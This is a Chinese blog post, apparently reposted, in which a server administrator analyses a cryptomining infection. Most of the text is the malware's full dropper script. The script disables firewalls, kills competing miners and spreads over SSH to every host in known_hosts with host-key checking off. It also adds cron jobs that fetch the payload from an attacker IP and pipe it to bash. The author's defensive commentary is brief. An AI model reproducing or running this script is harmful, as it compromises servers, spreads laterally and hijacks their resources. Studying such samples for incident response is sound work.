解析一个挖矿病毒
Posted 烂笔头儿
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了解析一个挖矿病毒相关的知识,希望对你有一定的参考价值。
服务器 cpu 异常
查看进程
将进程杀掉,文件删除,一会又起来了 sssus3 wc.conf
所以检查 定时任务
> cat /var/spool/cron/apache * * * * * wget -q -O - http://107.174.47.156/mr.sh | bash -sh > /dev/null 2>&1
果然有个定时任务
把定时任务清掉,一会又起来,于是把定时任务的脚本拉出来研究了一下(http://107.174.47.156/mr.sh)
#!/bin/sh
mkdir /var/tmp
chmod 777 /var/tmp/kworkerds
echo -e "\\n0.0.0.0 pastebin.com" >> /etc/hosts
touch /etc/ld.so.preload
# 解除锁定
chattr -i /usr/bin/wget
chmod 755 /usr/bin/wget
chattr -i /usr/bin/curl
chmod 755 /usr/bin/curl
# 关闭防火墙
/etc/init.d/iptables stop
service iptables stop
# suse 系统
SuSEfirewall2 stop
reSuSEfirewall2 stop
# 杀掉现有进程
pkill -f sysxlj
pkill -f jourxlv
pkill -f sustes
# 清除socket连接进程
netstat -antp | grep \'56415\' | grep \'ESTABLISHED\\|SYN_SENT\' | awk \'{print $7}\' | sed -e "s/\\/.*//g" | xargs kill -9
netstat -antp | grep \'139.99.120.75\' | grep \'ESTABLISHED\\|SYN_SENT\' | awk \'{print $7}\' | sed -e "s/\\/.*//g" | xargs kill -9
ps aux|grep "I2NvZGluZzogdXRmLTg"|grep -v grep|awk \'{print $2}\'|xargs kill -9
# 旧文件处理
rm -rf /usr/lib/void.so
rm -rf /etc/voidonce.sh
rm -rf /usr/local/lib/libjdk.so
rm -rf /usr/local/lib/libntp.so
# 下载并传播病毒脚本
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\\b([0-9]{1,3}\\.){3}[0-9]{1,3}\\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h \'(curl -fsSL http://107.174.47.156/mr.sh||wget -q -O- http://107.174.47.156/mr.sh)|bash -sh >/dev/null 2>&1 &\' & done
fi
# 下载病毒脚本
for file in /home/*
do
if test -d $file
then
if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\\b([0-9]{1,3}\\.){3}[0-9]{1,3}\\b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h \'(curl -fsSL http://107.174.47.156/mr.sh||wget -q -O- http://107.174.47.156/mr.sh)|bash -sh >/dev/null 2>&1 &\' & done
fi
fi
done
sed -i \'$d\' /etc/crontab
rm -rf /lib64/library1.so
rm -rf /usr/lib64/library1.so
# 解禁IP
iptables -I OUTPUT -s 167.99.166.61 -j DROP
iptables -I INPUT -s 167.99.166.61 -j DROP
iptables -I OUTPUT -p tcp -m string --string "pastebin" --algo bm -j DROP
iptables -I OUTPUT -p udp -m string --string "pastebin" --algo kmp -j DROP
rm -rf /etc/cron.monthly/oanacroner
rm -rf /etc/cron.daily/oanacroner
rm -rf /etc/cron.hourly/oanacroner
rm -rf /usr/local/bin/dns
echo "" > /etc/crontab
echo "" > /etc/cron.d/root
echo "" > /etc/cron.d/apache
echo "" > /var/spool/cron/root
echo "" > /var/spool/cron/crontabs/root
# 伪装程序1
chkconfig --del netdns
pkill -f netdns
echo "" > /etc/cron.d/system
chmod 777 /var/tmp
rm -rf /usr/local/bin/dns
rm -rf /usr/sbin/netdns
rm -rf /etc/init.d/netdns
rm -rf /etc/cron.monthly/oanacroner
rm -rf /etc/cron.daily/oanacroner
rm -rf /etc/cron.hourly/oanacroner
# 伪装程序2
chattr -i /usr/local/lib/libntpd.so
chmod 777 /usr/local/lib/libntpd.so
rm -rf /usr/local/lib/libntpd.so
sed -i \'/libntpd.so/d\' /etc/ld.so.preload
crontab -l | sed \'/pastebin.com/d\' | crontab -
netstat -antp | grep \'27.155.87.59\\|51.38.133.232\' | grep \'ESTABLISHED\' | awk \'{print $7}\' | sed -e "s/\\/.*//g" | xargs kill -9
netstat -antp | grep \'27.155.87.59\\|51.38.133.232\' | grep \'SYN_SENT\' | awk \'{print $7}\' | sed -e "s/\\/.*//g" | xargs kill -9
netstat -antp | grep \'104.160.171.94\\|170.178.178.57\\|91.236.182.1\\|52.15.72.79\\|52.15.62.13\\|51.38.133.232\' | grep \'ESTABLISHED\' | awk \'{print $7}\' | sed -e "s/\\/.*//g" | xargs kill -9
netstat -antp | grep \'104.160.171.94\\|170.178.178.57\\|91.236.182.1\\|52.15.72.79\\|52.15.62.13\\|51.38.133.232\' | grep \'CLOSE_WAIT\' | awk \'{print $7}\' | sed -e "s/\\/.*//g" | xargs kill -9
netstat -antp | grep \'104.160.171.94\\|170.178.178.57\\|91.236.182.1\\|52.15.72.79\\|52.15.62.13\\|51.38.133.232\' | grep \'SYN_SENT\' | awk \'{print $7}\' | sed -e "s/\\/.*//g" | xargs kill -9
netstat -antp | grep \'121.18.238.56\\|51.38.133.232\' | grep \'ESTABLISHED\' | awk \'{print $7}\' | sed -e "s/\\/.*//g" | xargs kill -9
netstat -antp | grep \'121.18.238.56\\|51.38.133.232\' | grep \'SYN_SENT\' | awk \'{print $7}\' | sed -e "s/\\/.*//g" | xargs kill -9
netstat -antp | grep \'103.99.115.220\\|51.38.133.232\' | grep \'SYN_SENT\' | awk \'{print $7}\' | sed -e "s/\\/.*//g" | xargs kill -9
netstat -antp | grep \'103.99.115.220\\|51.38.133.232\' | grep \'ESTABLISHED\' | awk \'{print $7}\' | sed -e "s/\\/.*//g" | xargs kill -9
pkill -f /usr/bin/.sshd
netstat -antp | grep \'202.144.193.110:3333\\|51.38.133.232\' | awk \'{print $7}\' | sed -e "s/\\/.*//g" | xargs kill -9
rm -rf /var/tmp/j*
rm -rf /tmp/j*
rm -rf /var/tmp/java
rm -rf /tmp/java
rm -rf /var/tmp/java2
rm -rf /tmp/java2
rm -rf /var/tmp/java*
rm -rf /tmp/java*
chattr -i /usr/lib/libiacpkmn.so.3 && rm -rf /usr/lib/libiacpkmn.so.3
chattr -i /etc/init.d/nfstruncate && rm -rf /etc/init.d/nfstruncate
rm -rf /etc/rc.d/rc*.d/S01nfstruncate /bin/nfstruncate
rm -rf /tmp/qW3xT.2 /tmp/ddgs.3013 /tmp/ddgs.3012 /tmp/wnTKYg /tmp/2t3ik
rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
rm -rf /tmp/*index_bak*
rm -rf /tmp/*httpd.conf*
rm -rf /tmp/*httpd.conf
# 添加定时任务
echo -e "*/1 * * * * root (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh\\n##" > /etc/cron.d/root
echo -e "*/2 * * * * root (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh\\n##" > /etc/cron.d/apache
echo -e "*/30 * * * * (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh\\n##" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e "* * * * * (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh\\n##" > /var/spool/cron/crontabs/root
mkdir -p /etc/cron.hourly
(curl -fsSL --connect-timeout 120 http://107.174.47.156/11 -o /etc/cron.hourly/oanacroner1||http://107.174.47.156/11 -O /etc/cron.hourly/oanacroner1) && chmod 755 /etc/cron.hourly/oanacroner1
rm -rf /tmp/a7b104c270
rm -rf /tmp/.uninstall* /tmp/.python* /tmp/.tables* /tmp/.mas
rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache
netstat -anp | grep :13531 |awk \'{print $7}\'| awk -F\'[/]\' \'{print $1}\' | xargs kill -9
chmod 777 /var/tmp/sustse
# 检测CPU阈值
ps aux | grep -vw \'kworkerds\\|sustse\' | awk \'{if($3>30.0) print $2}\' | while read procid
do
kill -9 $procid
done
ps ax | grep /tmp/ | grep -v grep | grep -v \'kworkerds\\|sustse\\|kworkerds\\|sustse\\|ppl\' | awk \'{print $1}\' | xargs kill -9
ps ax | grep \'wc.conf\\|wq.conf\\|wm.conf\' | grep -v grep | grep -v \'kworkerds\\|sustse\\|kworkerds\\|sustse\\|ppl\' | awk \'{print $1}\' | xargs kill -9
netstat -ant|grep \'185.161.70.34:3333\\|154.16.67.133:80\\|205.185.122.99:3333\'|grep \'ESTABLISHED\'|grep -v grep
if [ $? -eq 0 ]
then
pwd
else
curl -s http://107.174.47.156/2mr.sh | bash -sh || wget -q -O - http://107.174.47.156/2mr.sh | bash -sh
fi
sleep 2
# 检查定时任务
# -q 有匹配返回 0
if crontab -l | grep -q "107.174.47.156"
then
echo "Cron exists"
else
crontab -r
echo "Cron not found"
LDR="wget -q -O -"
if [ -s /usr/bin/curl ];
then
LDR="curl";
fi
if [ -s /usr/bin/wget ];
then
LDR="wget -q -O -";
fi
(crontab -l 2>/dev/null; echo "* * * * * $LDR http://107.174.47.156/mr.sh | bash -sh > /dev/null 2>&1")| crontab -
fi
rm -rf /var/tmp/jrm
rm -rf /tmp/jrm
pkill -f 185.222.210.59
pkill -f 95.142.40.81
pkill -f 192.99.142.232
chmod 777 /var/tmp/sustse
crontab -l | sed \'/185.222.210.59/d\' | crontab -
内容大家自己看吧 ,看完就知道该怎么操作了 : 把 authorized_keys 和 known_hosts 统统删掉
正则匹配
for h in $(grep -oE "\\b([0-9]{1,3}\\.){3}[0-9]{1,3}\\b" /root/.ssh/known_hosts);
do
ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h \'(curl -fsSL http://107.174.47.156/mr.sh||wget -q -O- http://107.174.47.156/mr.sh)|bash -sh >/dev/null 2>&1 &\' &
done
BatchMode:不显示交互窗口
ConnectTimeout:连接超时
StrictHostKeyChecking:取值 yes|no|ask ,有两种功能
1. 是否会自动地将远程主机的公钥记录到known_hosts中,
2. 二是当远程主机的公钥变化了,是否允许本地主机进行登录。
当StrictHostKeyChecking=no时,表示在连接远程主机时,会主动把对方的公钥加到known_hosts中,而不会提示用户是否要记录这样的信息,且当远程主机的公钥变化了,仍然会连接上,不会出现因为公钥不对连接失败
以上是关于解析一个挖矿病毒的主要内容,如果未能解决你的问题,请参考以下文章
服务器管理Ubuntu的一次惊心动魄的查杀挖矿病毒的经历:病毒伪装成python